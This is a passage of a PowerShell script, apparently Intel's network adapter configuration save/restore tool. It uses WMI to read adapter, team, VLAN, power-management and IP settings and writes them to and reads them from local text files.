$Script:context.Add('ClientSetId', [int] $Script:lockobj.ClientSetHandle) $Script:context.Add('SaveRestoreApply', $true) } # Remove WMI lock Function ReleaseLock { $inparams = $Script:service.GetMethodParameters("Apply") $inparams.ClientSetHandle=[int]$Script:lockobj.ClientSetHandle $null = $Script:Service.InvokeMethod("Apply", $inparams, $null) } Function NewObject ($class) { $classdef = New-Object System.Management.ManagementClass $class # the new object options $classdef.Options.UseAmendedQualifiers = $true $classdef.Options.Context = $Script:context return $classdef } Function DeleteObject ($object) { Write-Log $MyInvocation.MyCommand Write-Log $object # the delete options $deleteoptions = New-Object System.Management.DeleteOptions $deleteoptions.Context = $Script:context $object.Delete($deleteoptions) } Function SetSetting ($setting) { Write-Log $MyInvocation.MyCommand Write-Log "`$setting = $setting" # the put options $putoptions = New-Object System.Management.PutOptions($Script:context) $putoptions.UseAmendedQualifiers = $true #perform put $null = $setting.Put($putoptions) } # Get specified class object from WMI Function GetObject($class) { $querystring = [string] "SELECT * FROM $class" $query = New-Object System.Management.ObjectQuery($querystring) # the enumeration options $enumerate_option = New-Object System.Management.EnumerationOptions $enumerate_option.UseAmendedQualifiers = $true $enumerate_option.Context = $Script:context # setup scope $DMiXPath = New-Object System.Management.ManagementPath $DMiXPath.NamespacePath = "root\intelncs2" $scope = New-Object System.Management.ManagementScope($DMiXPath) $scope.Connect() # the searcher for the object $searcher = New-Object System.Management.ManagementObjectSearcher($scope, $query, $enumerate_option) $collection = $searcher.Get() # If the Get() above fails, it won't be caught until the return happens. So catch it and display an appropriate message. try { return $collection } catch { $ErrorMessage = [string]$Messages.NoObjectsFound Write-Error "$ErrorMessage $class" Write-Log "$ErrorMessage $class" exit } } # Get associated objects given the object path and where condition Function GetAssociated($path, $where) { $querystring = [string] "ASSOCIATORS OF {$path} WHERE $where" $query = New-Object System.Management.ObjectQuery($querystring) # the enumeration options $enumerate_option = New-Object System.Management.EnumerationOptions $enumerate_option.UseAmendedQualifiers = $true $enumerate_option.Context = $Script:context # setup scope $DMiXPath = New-Object System.Management.ManagementPath $DMiXPath.NamespacePath = "root\intelncs2" $scope = New-Object System.Management.ManagementScope($DMiXPath) $scope.Connect() # the searcher for the object $searcher = New-Object System.Management.ManagementObjectSearcher($scope, $query, $enumerate_option) $collection = $searcher.Get() return $collection } # Invoke a method given it's name, class and parameters Function InvokeMethod($Class,$Method,$ColParameterName,$ColParameterValue) { $Invoke_option = New-Object System.Management.InvokeMethodOptions $Invoke_option.Context = $Script:context $params = $null if ($null -ne $ColParameterName) { $params = $Class.psbase.GetMethodParameters($Method) if ($ColParameterName.count -gt 1) { for($i=0; $i -lt $ColParameterName.count; $i++) { $params.psbase.SetPropertyValue($ColParameterName[$i],$ColParameterValue[$i]) } } else { $params.psbase.SetPropertyValue($ColParameterName,$ColParameterValue) } } return $Class.psbase.InvokeMethod($Method,$params,$Invoke_option) } # Function used to write objects to config file. Function WriteObjectToConfigFile($NewObjects,$Properties) { Write-Log $MyInvocation.MyCommand Write-Log "`$NewObjects = $NewObjects" Write-Log "`$Properties = $Properties" if ($null -ne $NewObjects) { $ExportObject = $NewObjects | Select-Object $Properties | ConvertTo-Csv -NoTypeInformation $ExportObject = $ExportObject[1..$ExportObject.Count] WriteTextToConfigFile $ExportObject } } # Function used to write text to config file. Function WriteTextToConfigFile($NewText) { Write-Log $MyInvocation.MyCommand Write-Log "`$NewText = $NewText" $NewText | Out-File $Script:ConfigPath -Encoding utf8 -Append } # Function used to write objects to the IP config file. Function WriteObjectToIPFile($NewObjects,$Properties) { Write-Log $MyInvocation.MyCommand Write-Log "`$NewObjects = $NewObjects" Write-Log "`$Properties = $Properties" if ($null -ne $NewObjects) { $ExportObject = $NewObjects | Select-Object $Properties | ConvertTo-Csv -NoTypeInformation $ExportObject = $ExportObject[1..$ExportObject.Count] WriteTextToIPFile $ExportObject } } # Function used to write text to IP config file. Function WriteTextToIPFile($NewText) { Write-Log $MyInvocation.MyCommand Write-Log "`$NewText = $NewText" $NewText | Out-File $Script:ScriptPath\Saved_StaticIP.txt -Encoding utf8 -Append } # Function used to read objects from config file given a file section. Function ReadFromConfigFile($FileSection) { Write-Log $MyInvocation.MyCommand Write-Log "`$FileSection = $FileSection" $FileObjects=@() $FileObjects = Get-Content $Script:ConfigPath switch($FileSection) { "Adapters" { #Find the section for adapters and add 1 to not include AdaptersStart identifier $CsvObjectStart = [array]::indexof($FileObjects,"AdaptersStart") + 1 #Find the end of the section and remove 1 to not include AdaptersEnd identifier $CsvEnd = [array]::indexof($FileObjects,"AdaptersEnd") - 1 $colProperty = "Name","OriginalDisplayName","PermanentAddress","PCIDeviceID","SlotID" break } "AdapterSettings" { #Find the section for adapters and add 1 to not include AdapterSettingsStart identifier $CsvObjectStart = [array]::indexof($FileObjects,"AdapterSettingsStart") + 1 #Find the end of the section and remove 1 to not include AdapterSettingsEnd identifier $CsvEnd = [array]::indexof($FileObjects,"AdapterSettingsEnd") - 1 $colProperty = "Name","Caption","CurrentValue","CurrentValues","PermanentAddress","PCIDeviceID","SlotID" break } "OEMSetting" { #Find the section for adapters and add 1 to not include OEMSettingStart identifier $CsvObjectStart = [array]::indexof($FileObjects,"OEMSettingStart") + 1 #Find the end of the section and remove 1 to not include OEMSettingEnd identifier $CsvEnd = [array]::indexof($FileObjects,"OEMSettingEnd") - 1 $colProperty = "OEMCustomizeable" break } "PMSettings" { #Find the section for adapters and add 1 to not include PMSettingsStart identifier $CsvObjectStart = [array]::indexof($FileObjects,"PMSettingsStart") + 1 #Find the end of the section and remove 1 to not include PMSettingsEnd identifier $CsvEnd = [array]::indexof($FileObjects,"PMSettingsEnd") - 1 $colProperty = "Name","Caption","CurrentValue","CurrentValues","PermanentAddress","PCIDeviceID","SlotID" break } "Teams" { #Find the section for adapters and add 1 to not include TeamsStart identifier $CsvObjectStart = [array]::indexof($FileObjects,"TeamsStart") + 1 #Find the end of the section and remove 1 to not include TeamsEnd identifier $CsvEnd = [array]::indexof($FileObjects,"TeamsEnd") - 1 $colProperty = "TeamName","TeamMembers","TeamMode","PrimaryAdapter","SecondaryAdapter" break } "TeamSettings" { #Find the section for adapters and add 1 to not include TeamSettingsStart identifier $CsvObjectStart = [array]::indexof($FileObjects,"TeamSettingsStart") + 1 #Find the end of the section and remove 1 to not include TeamSettingsEnd identifier $CsvEnd = [array]::indexof($FileObjects,"TeamSettingsEnd") - 1 $colProperty = "TeamName","Caption","CurrentValue","CurrentValues" break } "Vlans" { #Find the section for adapters and add 1 to not include VlansStart identifier $CsvObjectStart = [array]::indexof($FileObjects,"VlansStart") + 1 #Find the end of the section and remove 1 to not include VlansEnd identifier $CsvEnd = [array]::indexof($FileObjects,"VlansEnd") - 1 $colProperty = "ParentName","VLANID","VLANNAME","ParentPermanentAddress","ParentPCIDeviceID","ParentSlotID" break } "VlanSettings" { #Find the section for adapters and add 1 to not include VlanSettingsStart identifier $CsvObjectStart = [array]::indexof($FileObjects,"VlanSettingsStart") + 1 #Find the end of the section and remove 1 to not include VlanSettingsEnd identifier $CsvEnd = [array]::indexof($FileObjects,"VlanSettingsEnd") - 1 $colProperty = "ParentName","Name","VLANID","Caption","CurrentValue","ParentPermanentAddress","ParentPCIDeviceID","ParentSlotID" break } "NICPARTSettings" { #Find the section for adapters and add 1 to not include NICPARTSettingsStart identifier $CsvObjectStart = [array]::indexof($FileObjects,"NICPARTSettingsStart") + 1 #Find the end of the section and remove 1 to not include NICPARTSettingsEnd identifier $CsvEnd = [array]::indexof($FileObjects,"NICPARTSettingsEnd") - 1 $colProperty = "Name","PartitionNumber","Identifier","MinBWPercent","MaxBWPercent" break } Default { return } } #If no items were found in the provided section return nothing if ($CsvEnd -lt $CsvObjectStart) { return } #Else return only the provided section and convert the text into objects else { return $FileObjects[$CsvObjectStart..$CsvEnd] | ConvertFrom-Csv -Header $colProperty } } # Function used to read objects from config file. Function ReadFromIPFile($FileSection) { Write-Log $MyInvocation.MyCommand Write-Log "`$FileSection = $FileSection" $FileObjects=@() $FileObjects = Get-Content $Script:ScriptPath\Saved_StaticIP.txt switch($FileSection) { "AdapterIPSettings" { #Find the section for adapters and add 1 to not include AdapterIPSettingsStart identifier $CsvObjectStart = [array]::indexof($FileObjects,"AdapterIPSettingsStart") + 1 #Find the end of the section and remove 1 to not include AdapterIPSettingsEnd identifier $CsvEnd = [array]::indexof($FileObjects,"AdapterIPSettingsEnd") - 1 $colProperty = "Name","Caption","CurrentValue","CurrentValues","PermanentAddress","PCIDeviceID","SlotID" break } "TeamIPSettings" { #Find the section for adapters and add 1 to not include TeamIPSettingsStart identifier $CsvObjectStart = [array]::indexof($FileObjects,"TeamIPSettingsStart") + 1 #Find the end of the section and remove 1 to not include TeamIPSettingsEnd identifier $CsvEnd = [array]::indexof($FileObjects,"TeamIPSettingsEnd") - 1 $colProperty = "TeamName","Caption","CurrentValue","CurrentValues" break } "VlanIPSettings" { #Find the section for adapters and add 1 to not include VlanIPSettingsStart identifier $CsvObjectStart = [array]::indexof($FileObjects,"VlanIPSettingsStart") + 1 #Find the end of the section and remove 1 to not include VlanIPSettingsEnd identifier $CsvEnd = [array]::indexof($FileObjects,"VlanIPSettingsEnd") - 1 $colProperty = "ParentName","VLANID","Caption","CurrentValue","CurrentValues","ParentPermanentAddress","ParentPCIDeviceID","ParentSlotID" break } Default { return } } # If no items were found in the provided section return nothing if ($CsvEnd -lt $CsvObjectStart) { return } # Else return only the provided section and convert the text into objects else { return $FileObjects[$CsvObjectStart..$CsvEnd] | ConvertFrom-Csv -Header $colProperty } } # Add the parent adapter identifiers to the setting objects Function AddParentIDs($Setting) { Write-Log $MyInvocation.MyCommand Write-Log "`$Setting = $Setting" #Add the PermanentAddress, PCIDeviceID and SlotID to the settings object $SettingAdapter = $Script:Adapters | Where-Object {$_.DeviceID -eq $Setting.ParentId} if ($SettingAdapter) { $Setting | Add-Member -Name "PermanentAddress" -Value $SettingAdapter.PermanentAddress -MemberType NoteProperty $Setting | Add-Member -Name "PCIDeviceID" -Value $SettingAdapter.PCIDeviceID -MemberType NoteProperty $AdapterSlotID = $SettingAdapter.SlotID.split(":")[0..2] #return only the first three elements in array $AdapterBDF = [string]::Join(':',$AdapterSlotID) $Setting | Add-Member -Name "SlotID" -Value $AdapterBDF -MemberType NoteProperty } } Function PrintUsage { Write-Host $Messages.Usage exit } Function CheckForAdminRights { $winIdent = [Security.Principal.WindowsIdentity]::GetCurrent() $WinPrinc = [Security.Principal.WindowsPrincipal] $winIdent $AdminId = [Security.Principal.WindowsBuiltInRole] "Administrator" if (-Not $WinPrinc.IsInRole($AdminId)) { Write-Error $Messages.AdminRequired exit } } Function CheckForDMiXInstall { Write-Log $MyInvocation.MyCommand $DMiXInstall = Get-ItemProperty -Path HKLM:\SOFTWARE\Intel\Network_Services\DMIX -Name InstalledDMIX -ErrorAction SilentlyContinue if ((!$DMiXInstall) -or ($DMiXInstall.InstalledDMIX -ne 1)) { Write-Error $Messages.PROSetRequired exit } } Function CheckForANSInstall { Write-Log $MyInvocation.MyCommand $ANSInstall = Get-ItemProperty -Path HKLM:\SOFTWARE\Intel\Network_Services\DMIX -Name InstalledDMIX_ANS -ErrorAction SilentlyContinue if ((!$ANSInstall) -or ($ANSInstall.InstalledDMIX_ANS -ne 1)) { $Script:bANSInstalled = $false } } Function CheckIfConfigFileExists { Write-Log $MyInvocation.MyCommand if (!(Test-Path $Script:ConfigPath -PathType Leaf)) { $ErrorMessagePart1 = [string]$Messages.ConfigNotFoundPart1 $ErrorMessagePart2 = [string]$Messages.ConfigNotFoundPart2 Write-Error "$ErrorMessagePart1 $Script:ConfigPath. $ErrorMessagePart2" exit } } Function CheckIfConfigShouldBeOverwritten { Write-Log $MyInvocation.MyCommand if (!(Test-Path $Script:ConfigPath.ToString() -PathType Container)) { $FileExistsString = [string]$Messages.FileExistsPrompt $confirmation = Read-Host -Prompt "$Script:ConfigPath $FileExistsString" if ($confirmation -notmatch "[yY]") { exit } } } Function Write-Log($string) { $timestamp = "[$(Get-Date -Format G)] " $string = $timestamp + $string Write-Verbose -Message $string } # Sets a global variable for the configuration file paths to be saved/restored from. Function SetupSaveRestoreLocation { Write-Log $MyInvocation.MyCommand $Script:ScriptPath = Get-Location # If the user did not specify a path, use the scripts path if ($Script:bUpSave -eq $true -or $Script:bUpRestore -eq $true) { $Script:ConfigPath = Get-Location $Script:ConfigPath = $Script:ConfigPath + "\Upgrade_Saved_Config.txt" } elseif (!$Script:ConfigPath) { $Script:ConfigPath = Get-Location $Script:ConfigPath = $Script:ConfigPath + "\Saved_Config.txt" #Check if the file exist during a save if ($Script:bSave -eq $true -and (Test-Path $Script:ConfigPath -PathType Leaf)) { CheckIfConfigShouldBeOverwritten } } else { #Only prompt to overwrite if we are doing save and file exists if (($Script:bSave -eq $true -or $Script:bUpSave -eq $true) -and (Test-Path $Script:ConfigPath -PathType Leaf)) { CheckIfConfigShouldBeOverwritten } #Current dir is default $FilePath = "." #Find position of the last backslash before the filename $FileNamePos = $Script:ConfigPath.ToString().LastIndexOf("\") #pos = -1 means ConfigPath contains just the file name - use current dir in this case if ($FileNamePos -ne -1) { #Separate the filename from the path to verify path exists $FilePath = $Script:ConfigPath.ToString().Substring(0, $FileNamePos) } #Check that config path exists if (!(Test-Path $FilePath -PathType Container)) { $ErrorMessagePart1 = [string]$Messages.ConfigPathDoesntExist1 $ErrorMessagePart2 = [string]$Messages.ConfigPathDoesntExist2 Write-Error "$ErrorMessagePart1 $FilePath $ErrorMessagePart2" exit } #Check the input of the config file when Saving if ($Script:bSave -eq $true -or $Script:bUpSave -eq $true) { Try { Out-File $Script:ConfigPath -ErrorAction Stop } Catch { Write-Error $Messages.ConfigFileNotSpecified Write-Log $Messages.ConfigFileNotSpecified exit } } #Check the input of the config file when Restoring elseif (!(Test-Path $Script:ConfigPath)) { Write-Error $Messages.ConfigFileNotSpecified exit } } Write-Host $Messages.RunningSaveRestore $Script:ConfigPath } # Get the present and enabled adapters on the system. Function GetAdaptersOnSystem { Write-Log $MyInvocation.MyCommand #Only store adapters that have a status of 3 (which means enabled) $Script:EnabledSystemAdapters = GetObject "IANet_PhysicalEthernetAdapter" | Where-Object {($_.StatusInfo -eq 3)} | Sort-Object -Property Name #Only store adapters that support DMiX or Extended DMiX capability or if it is intel vendor capable and this is an upgrade. $Script:Adapters = $Script:EnabledSystemAdapters | Where-Object {($_.Capabilities -eq 73) -or ($_.Capabilities -eq 74) -or (($_.Capabilities -eq 47) -and (($bUpSave -eq $true) -or ($bUpRestore -eq $true)))} #Save Teamable adapters to be referenced for teams } # Remove any present configuration files Function RemoveOldFiles { Write-Log $MyInvocation.MyCommand # check if the file exists before trying to remove it if (Test-Path $Script:ConfigPath -PathType Leaf) { Remove-Item $Script:ConfigPath } if (Test-Path $Script:ScriptPath\Saved_StaticIP.txt) { Remove-Item $Script:ScriptPath\Saved_StaticIP.txt } } # Save adapters on system to the configuration file Function SaveAdapters { Write-Log $MyInvocation.MyCommand WriteTextToConfigFile "AdaptersStart" $colProperty = "Name","OriginalDisplayName","PermanentAddress","PCIDeviceID","SlotID" WriteObjectToConfigFile $Script:EnabledSystemAdapters $colProperty WriteTextToConfigFile "AdaptersEnd" WriteTextToConfigFile "" } # Save OEM customization value Function SaveOEMCustomizeableSetting { Write-Log $MyInvocation.MyCommand WriteTextToConfigFile "OEMSettingStart" $OEMSetting = Get-ItemProperty -Path HKLM:\SOFTWARE\Intel\Network_Services\NCS2 -Name OEMCustomizeable -ErrorAction SilentlyContinue # If a value is present save it to the config file if ($null -ne $OEMSetting) { WriteObjectToConfigFile $OEMSetting OEMCustomizeable } WriteTextToConfigFile "OEMSettingEnd" WriteTextToConfigFile "" } # Save any legacy power management settings Function SavePowerManagementSettings { Write-Log $MyInvocation.MyCommand $colProperty = "Name","Caption","CurrentValue",@{expression={$_.CurrentValues -join ","};label="CurrentValues"},"PermanentAddress","PCIDeviceID","SlotID" WriteTextToConfigFile "PMSettingsStart" foreach ($Adapter in $Script:Adapters) { try { #Get the Power Management settings for adapter $PowerSettingValues = InvokeMethod $Adapter GetPowerUsageOptions $null $null $PowerSettingProperties = @{Name = $Adapter.Name; CurrentValue = $PowerSettingValues.AutoPowerSaveModeEnabled; CurrentValues = {}; PermanentAddress = $Adapter.PermanentAddress; PCIDeviceID = $Adapter.PCIDeviceID; SlotID = $Adapter.SlotID} # Check each Power Management setting to see if it NULL before trying to save it to the config file # if there is a value, create a custom object and save it to the config file if ($null -ne $PowerSettingValues.AutoPowerSaveModeEnabled) { $Setting = New-Object PSObject -Property $PowerSettingProperties $Setting | Add-Member -Name "Caption" -Value "AutoPowerSaveModeEnabled" -MemberType NoteProperty WriteObjectToConfigFile $Setting $colProperty } if ($null -ne $PowerSettingValues.ReduceSpeedOnPowerDown) { $Setting = New-Object PSObject -Property $PowerSettingProperties $Setting | Add-Member -Name "Caption" -Value "ReduceSpeedOnPowerDown" -MemberType NoteProperty WriteObjectToConfigFile $Setting $colProperty } if ($null -ne $PowerSettingValues.SmartPowerDown) { $Setting = New-Object PSObject -Property $PowerSettingProperties $Setting | Add-Member -Name "Caption" -Value "SmartPowerDown" -MemberType NoteProperty WriteObjectToConfigFile $Setting $colProperty } if ($null -ne $PowerSettingValues.SavePowerNowEnabled) { $Setting = New-Object PSObject -Property $PowerSettingProperties $Setting | Add-Member -Name "Caption" -Value "SavePowerNowEnabled" -MemberType NoteProperty WriteObjectToConfigFile $Setting $colProperty } if ($null -ne $PowerSettingValues.EnhancedASPMPowerSaver) { $Setting = New-Object PSObject -Property $PowerSettingProperties $Setting | Add-Member -Name "Caption" -Value "EnhancedASPMPowerSaver" -MemberType NoteProperty WriteObjectToConfigFile $Setting $colProperty } } catch { Write-Log "Unable to Save Power Management Settings" } } WriteTextToConfigFile "PMSettingsEnd" WriteTextToConfigFile "" } # Some settings need to be saved in a certain order, this function stops them from being saved now so they can be saved later by returning # whether it should be saved immidiately or later (using true or false). Function SaveAdapterSettingLater($Setting, $bIPSetting) { Write-Log $MyInvocation.MyCommand Write-Log "`$Setting = $Setting" Write-Log "`$bIPSetting = $bIPSetting" $bRet = $true # Don't save the settings now if it is an IP, DCB, performance profile, SRIOV, VMQueues, or NUMVF setting if (($bIPSetting -eq $false) -and ($Setting.GroupId -ne 12 ) -and ($Setting.GroupId -ne 8 ) -and ($Setting.Caption -ne "PerformanceProfile") -and ($Setting.Caption -ne "*FlowControl") -and ($Setting.Caption -ne "*PriorityVLANTag") -and ($Setting.Caption -ne "*SRIOV") -and ($Setting.Caption -ne "VMQueues") -and ($Setting.Caption -ne "*NumVFs")) { $bRet = $false } return $bRet } # Check if the given setting is an IP setting and save it in the IP config file and return if it is an IP setting (true or false). # Depending on the device different properties of the object need to be saved. Function SaveIPSetting($Setting,$DeviceType,$EnabledDHCP,$bSaveIPv6Settings) { Write-Log $MyInvocation.MyCommand Write-Log "`$DeviceType = $DeviceType" Write-Log "`$Setting = $Setting" Write-Log "`$bEnabledDHCP = $EnabledDHCP" Write-Log "`$bSaveIPv6Settings = $bSaveIPv6Settings" $bIPSetting = $false $bSaveIpSetting = $false # Check if the passed in setting is one of these IP settings. # Some IP settings need DHCP enabled to restore. switch($Setting.Caption) { "IPAddress" { $bIPSetting = $true if ($EnabledDHCP -eq 0) { $bSaveIpSetting = $true } } "IPv4Address" { $bIPSetting=$true if ($EnabledDHCP -eq 0) { $bSaveIpSetting = $true } } "IPv6Address" { $bIPSetting=$true if ($bSaveIPv6Settings -eq $true) { $bSaveIpSetting = $true } } "PrefixLength" { $bIPSetting=$true if ($bSaveIPv6Settings -eq $true) { $bSaveIpSetting = $true } } "SubnetMask" { $bIPSetting=$true if ($EnabledDHCP -eq 0) { $bSaveIpSetting = $true } } "DefaultGateway" { $bIPSetting=$true if ($EnabledDHCP -eq 0) { $bSaveIpSetting = $true } } "DefaultGatewayIPv6" { $bIPSetting=$true if ($bSaveIPv6Settings -eq $true) { $bSaveIpSetting = $true } } "NameServer" { $bIPSetting=$true if($EnabledDHCP -eq 0) { $bSaveIpSetting = $true } } "NameServerList" { $bIPSetting=$true $bSaveIpSetting = $true } "NetbiosOptions" { $bIPSetting=$true $bSaveIpSetting = $true } } # Save IP settings with different properties depending on the device type if ($bSaveIpSetting -eq $true -and $DeviceType -eq "Adapter") { $colProperty = "Name","Caption","CurrentValue",@{expression={$_.CurrentValues -join ","};label="CurrentValues"},"PermanentAddress","PCIDeviceID","SlotID" WriteObjectToIPFile $Setting $colProperty } elseif ($bSaveIpSetting -eq $true -and $DeviceType -eq "Team") { $colProperty = "TeamName","Caption","CurrentValue",@{expression={$_.CurrentValues -join ","};label="CurrentValues"} WriteObjectToIPFile $Setting $colProperty } elseif ($bSaveIpSetting -eq $true -and $DeviceType -eq "Vlan") { $colProperty = "ParentName","VLANID","Caption","CurrentValue",@{expression={$_.CurrentValues -join ","};label="CurrentValues"},"ParentPermanentAddress","ParentPCIDeviceID","ParentSlotID" WriteObjectToIPFile $Setting $colProperty } return $bIPSetting } # Save the adapter settings Function SaveAdapterSettings() { Write-Log $MyInvocation.MyCommand $colProperty = "Name","Caption","CurrentValue",@{expression={$_.CurrentValues -join ","};label="CurrentValues"},"PermanentAddress","PCIDeviceID","SlotID" # Save power management settings SavePowerManagementSettings WriteTextToConfigFile "AdapterSettingsStart" WriteTextToIPFile "AdapterIPSettingsStart" foreach ($Adapter in $Script:Adapters) { # Get the settings associated with the adapter $colSettings = GetAssociated $Adapter.path.path "ResultClass = IANet_AdapterSetting" $colSettings = $colSettings | Sort-Object -Property Name,Caption # Check status of EnablDHCP for IP settings later $EnableDHCPCol = $colSettings | Where-Object {($_.Caption -eq "EnableDHCP")} | Select-Object $colProperty $EnableDHCPv6Col = $colSettings | Where-Object {($_.Caption -eq "EnableDHCPv6")} | Select-Object $colProperty $ManualIPv6Col = $colSettings | Where-Object {($_.Caption -eq "ManualIPv6")} | Select-Object $colProperty #Get the DHCP enable value for the specific adapter $EnableDHCP = $EnableDHCPCol | Where-Object {($_.Name -eq $Adapter.Name)} # Get the DHCPv6 enable value, and the ManualIPv6 value # EnableDHCPv6 is 0 (disabled) only if the "Managed Address Configuration Flag" and the "Other Stateful Configuration Flag" are both 0 # (see https://blogs.technet.microsoft.com/teamdhcp/2009/03/03/dhcpv6-understanding-of-address-configuration-in-automatic-mode-and-installation-of-dhcpv6-server/) # ManualIPv6 is 1 (manual) only if the PrefixOrigin and SuffixOrigin of any IPv6 address are both "Manual" - other values indicate autoconfiguration $EnableDHCPv6 = $EnableDHCPv6Col | Where-Object {($_.Name -eq $Adapter.Name)} $ManualIPv6 = $ManualIPv6Col | Where-Object {($_.Name -eq $Adapter.Name)} $bSaveIPv6Settings = $false #if EnableDHCPv6 = 0 and ManualIPv6 = 1, we want to save IPv6 addresses and settings. Otherwise, all IPv6 addresses were autoconfigured and we don't need to save/restore them if($EnableDHCPv6.CurrentValue -eq 0 -and $ManualIPv6.CurrentValue -eq 1) { $bSaveIPv6Settings = $true } foreach ($Setting in $colSettings) { AddParentIDs $Setting #check if setting is an IP setting save them in the IP config file instead of the Saved_Config file $bIPSetting = SaveIPSetting $Setting "Adapter" $EnableDHCP.CurrentValue $bSaveIPv6Settings #Check to see if the setting should be saved later $bRet = SaveAdapterSettingLater $Setting $bIPSetting if ($bRet -eq $false) { WriteObjectToConfigFile $Setting $colProperty } } # Check if DCB is being updated and if so, don't save the settings so the default values are restored $RestoreDCB = $true $FCoEUpdate = Get-ItemProperty -Path HKLM:\SOFTWARE\Intel\Prounstl -Name DCB_Update_FCoE -ErrorAction SilentlyContinue if ($null -ne $FCoEUpdate) { if ($FCoEUpdate.DCB_Update_FCoE -eq 1) { #FCoE is changing don't save settings $RestoreDCB = $false } } $iSCSIUpdate = Get-ItemProperty -Path HKLM:\SOFTWARE\Intel\Prounstl -Name DCB_Update_iSCSI -ErrorAction SilentlyContinue if ($null -ne $iSCSIUpdate) { if ($iSCSIUpdate.DCB_Update_iSCSI -eq 1) { #iSCSI is changing don't save settings $RestoreDCB = $false } } #Save *SRIOV after *VMQ $SRIOVSetting = $colSettings | Where-Object {($_.Caption -eq "*SRIOV")} WriteObjectToConfigFile $SRIOVSetting $colProperty #Save DCB Settings if this is not an upgrade or if it is an upgrade, and we are modifying DCB if (($Script:bUpSave -eq $false) -or ($RestoreDCB -eq $true)) { $colDCBSettings = $colSettings | Where-Object {($_.GroupId -eq 12) -or ($_.GroupId -eq 8)} WriteObjectToConfigFile $colDCBSettings $colProperty } #Save the performance profile $ProfileSetting = $colSettings | Where-Object {($_.Caption -eq "PerformanceProfile")} WriteObjectToConfigFile $ProfileSetting $colProperty #Save the FlowControl after performance profile and DCB $FlowControlSetting = $colSettings | Where-Object {($_.Caption -eq "*FlowControl")} WriteObjectToConfigFile $FlowControlSetting $colProperty #Save the PriorityVLANTag after performance profile and DCB $PriorityVLANTagSetting = $colSettings | Where-Object {($_.Caption -eq "*PriorityVLANTag")} WriteObjectToConfigFile $PriorityVLANTagSetting $colProperty #Save VMQueues and *NUMVFs last $VMQQueuesSetting = $colSettings | Where-Object {($_.Caption -eq "VMQueues")} WriteObjectToConfigFile $VMQQueuesSetting $colProperty $NumVFsSetting = $colSettings | Where-Object {($_.Caption -eq "*NumVFs")} WriteObjectToConfigFile $NumVFsSetting $colProperty } WriteTextToConfigFile "AdapterSettingsEnd" WriteTextToConfigFile "" WriteTextToIPFile "AdapterIPSettingsEnd" WriteTextToIPFile "" } #Save team information Function SaveTeams { Write-Log $MyInvocation.MyCommand #Get current teams on system $colProperty = "TeamName","TeamMembers","TeamMode","PrimaryAdapter","SecondaryAdapter" $colItems = GetObject "IANet_TeamOfAdapters" | Select-Object $colProperty | Sort-Object -Property TeamName WriteTextToConfigFile "TeamsStart" # if there are teams on system save the team information to the config file. if ($colItems) { # convert Member arrays into a "single" value to save foreach ($item in $colItems) { $TeamMembers = $item.TeamMembers $item.TeamMembers = @() for (($i = 0); $i -lt $TeamMembers.Count; $i++) { $adapter = GetObject IANet_PhysicalEthernetAdapter | Where-Object {($_.OriginalDisplayName -eq $TeamMembers[$i])} $PermanentAddress = $adapter | Select-Object -ExpandProperty "PermanentAddress" $PCIDeviceID = $adapter | Select-Object -ExpandProperty "PCIDeviceID" $SlotID = $adapter | Select-Object -ExpandProperty "SlotID" $item.TeamMembers += $TeamMembers[$i] + "," + $PermanentAddress + "," + $PCIDeviceID + "," + $SlotID } $item.TeamMembers = $item.TeamMembers -join '|' } WriteObjectToConfigFile $colItems * } WriteTextToConfigFile "TeamsEnd" WriteTextToConfigFile "" } # Save team settings Function SaveTeamSettings { Write-Log $MyInvocation.MyCommand # Get the current team settings $colProperty = "TeamName","Caption","CurrentValue",@{expression={$_.CurrentValues -join ","};label="CurrentValues"} $colSettings = GetObject "IANet_TeamSetting" | Sort-Object -Property Name,Caption WriteTextToConfigFile "TeamSettingsStart" WriteTextToIPFile "TeamIPSettingsStart" # Check status of EnablDHCP for IP settings later $EnableDHCPCol = $colSettings | Where-Object {($_.Caption -eq "EnableDHCP")} | Select-Object $colProperty $EnableDHCPv6Col = $colSettings | Where-Object {($_.Caption -eq "EnableDHCPv6")} | Select-Object $colProperty $ManualIPv6Col = $colSettings | Where-Object {($_.Caption -eq "ManualIPv6")} | Select-Object $colProperty foreach ($Setting in $colSettings) { # Get the DHCP enable value for the specific Team $EnableDHCP = $EnableDHCPCol | Where-Object {($_.TeamName -eq $Setting.Name)} # Get the DHCPv6 enable value, and the ManualIPv6 value # EnableDHCPv6 is 0 (disabled) only if the "Managed Address Configuration Flag" and the "Other Stateful Configuration Flag" are both 0 # (see https://blogs.technet.microsoft.com/teamdhcp/2009/03/03/dhcpv6-understanding-of-address-configuration-in-automatic-mode-and-installation-of-dhcpv6-server/) # ManualIPv6 is 1 (manual) only if the PrefixOrigin and SuffixOrigin of any IPv6 address are both "Manual" - other values indicate autoconfiguration $EnableDHCPv6 = $EnableDHCPv6Col | Where-Object {($_.TeamName -eq $Setting.Name)} $ManualIPv6 = $ManualIPv6Col | Where-Object {($_.TeamName -eq $Setting.Name)} $bSaveIPv6Settings = $false # if EnableDHCPv6 = 0 and ManualIPv6 = 1, we want to save IPv6 addresses and settings. Otherwise, all IPv6 addresses were autoconfigured and we don't need to save/restore them if ($EnableDHCPv6.CurrentValue -eq 0 -and $ManualIPv6.CurrentValue -eq 1) { $bSaveIPv6Settings = $true } # Save the IP Settings in the IP config file $bIPSetting = SaveIPSetting $Setting "Team" $EnableDHCP.CurrentValue $bSaveIPv6Settings if ($bIPSetting -eq $false) { WriteObjectToConfigFile $Setting $colProperty } } WriteTextToConfigFile "TeamSettingsEnd" WriteTextToConfigFile "" WriteTextToIPFile "TeamIPSettingsEnd" WriteTextToIPFile "" } # Save vlan information Function SaveVlans { Write-Log $MyInvocation.MyCommand #Get the vlans on the system $colProperty = "ParentName", "VLANID", "VLANNAME", "ParentPermanentAddress", "ParentPCIDeviceID", "ParentSlotID" $colVlans = GetObject "IANet_VLAN" | Sort-Object -Property Parent,VLANID WriteTextToConfigFile "VlansStart" # Save untagged vlan last if there are vlans on the system if ($colVlans) { $colTaggedVlans = $colVlans | Where-Object {($_.VLANID -ne 0)} WriteObjectToConfigFile $colTaggedVlans $colProperty $colUnTaggedVlans = $colVlans | Where-Object {($_.VLANID -eq 0)} WriteObjectToConfigFile $colUnTaggedVlans $colProperty } WriteTextToConfigFile "VlansEnd" WriteTextToConfigFile "" } # Save vlan settings Function SaveVlanSettings { Write-Log $MyInvocation.MyCommand #Get vlan settings on system $colProperty = "ParentName","Name","VLANID","Caption","CurrentValue","ParentPermanentAddress","ParentPCIDeviceID","ParentSlotID" $colSettings = GetObject "IANet_VLANSetting" | Sort-Object 